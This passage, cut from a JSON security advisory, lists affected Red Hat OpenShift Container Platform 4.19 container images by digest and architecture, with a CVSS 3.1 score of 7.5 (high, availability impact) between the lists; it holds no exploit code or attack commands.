"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
